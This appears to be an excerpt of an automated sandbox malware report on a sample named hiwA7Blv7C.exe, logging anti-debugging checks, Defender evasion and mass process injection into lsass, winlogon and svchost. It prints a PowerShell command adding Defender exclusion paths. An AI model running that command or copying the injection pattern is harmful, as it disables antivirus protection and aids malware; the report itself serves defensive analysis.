                    Source: svchost.exe, 0000001E.00000002.3321323009.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                    Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_14-471
                    Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_42-474
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000002D0165E7D90
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D2B38 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,Sleep,14_2_00007FF68D3D2B38
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000002D0165E7D90
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165F6218 SetUnhandledExceptionFilter,23_2_000002D0165F6218
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000002D0165ED2A4
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F1517D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002D6F1517D90
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002D6F151D2A4
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F1577D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002D6F1577D90
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F1586218 SetUnhandledExceptionFilter,27_2_000002D6F1586218
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F157D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000002D6F157D2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000014E41FDD2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000014E41FD7D90
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B096218 SetUnhandledExceptionFilter,31_2_000001D15B096218
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B08D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001D15B08D2A4
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B087D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001D15B087D90
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_0000023AF32ED2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_0000023AF32E7D90
                    Source: C:\Windows\System32\dialer.exeCode function: 47_2_00007FF75E941131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,47_2_00007FF75E941131
                    Source: C:\Windows\System32\dialer.exeCode function: 47_2_00007FF75E94C1B8 SetUnhandledExceptionFilter,47_2_00007FF75E94C1B8
                    Source: C:\Windows\System32\dialer.exeCode function: 47_2_00007FF75E943EF9 SetUnhandledExceptionFilter,47_2_00007FF75E943EF9
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_0000023C9FD9D2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_0000023C9FD97D90
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA717D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001A1CA717D90
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA726218 SetUnhandledExceptionFilter,51_2_000001A1CA726218
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA71D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001A1CA71D2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00000246EDE6D2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE76218 SetUnhandledExceptionFilter,53_2_00000246EDE76218
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00000246EDE67D90
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00000200A19BD2A4
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00000200A19B7D90
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000022596687D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_0000022596687D90
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_000002259668D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_000002259668D2A4

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2D016580000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2D6F14E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E41FA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1D15B020000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2D016610000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2D6F1540000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E428D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1D15B050000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23AF32B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23C9FD60000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 246ED7B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200A1980000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22595FB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22E670C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24C19A40000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275D1FC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23BBDC90000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 227D8FC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2DED2C70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14ACE6B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 220AEFD0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241B6940000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 202A22A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14D25AA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A63950000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1834ABA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D8F03D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18BAF3C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256EBEB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2568E1B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 226A7DC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1110000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2C0F50000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22B68FC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207EA5A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 11CD6340000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AFDEB70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207C0460000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 245A2150000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 247087D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F60740000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E569B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2CA8FE60000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1D63DC30000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A799B20000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F6963C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26481BB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 166D2D90000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 128DE440000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2101D0E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: BC80000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 192D1E50000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26DD2000000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257155B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 16443E50000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A9452E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 29227D20000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C4F660000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 281CF7C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28843650000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1B9870D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20CDE980000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 21A39370000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1411DE90000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D1C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,14_2_00007FF68D3D1C88
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 1658273CJump to behavior
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E273CJump to behavior
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA273CJump to behavior
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1661273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F154273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 428D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B05273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD6273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: ED7B273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A198273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 670C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4A4B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19A4273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1FC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDC9273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D8FC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2C7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE6B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEFD273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B694273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A22A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25AA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A2F273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6395273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ABA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F03D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF3C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBEB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E1B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7DC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 111273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0F5273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D7C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 68FC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EA5A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE8A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D634273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEB7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C046273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A215273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6074273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 569B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8FE6273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3DC3273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99B2273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 963C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 81BB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2D9273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE44273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1D0E273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BC8273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1E5273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D200273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 155B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 43E5273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6FC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6828273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 452E273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27D2273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E5C0273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B07C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F66273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE87273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B9F273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3CD273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CF7C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4365273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40F1273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 870D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 325B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5EDA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE98273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3E64273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3937273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1DE9273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EE9C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EED7273C
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeNtQuerySystemInformation: Direct from: 0x7FF72727304EJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeNtQuerySystemInformation: Direct from: 0x7FF65699304EJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B020000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016610000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1540000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E428D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B050000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
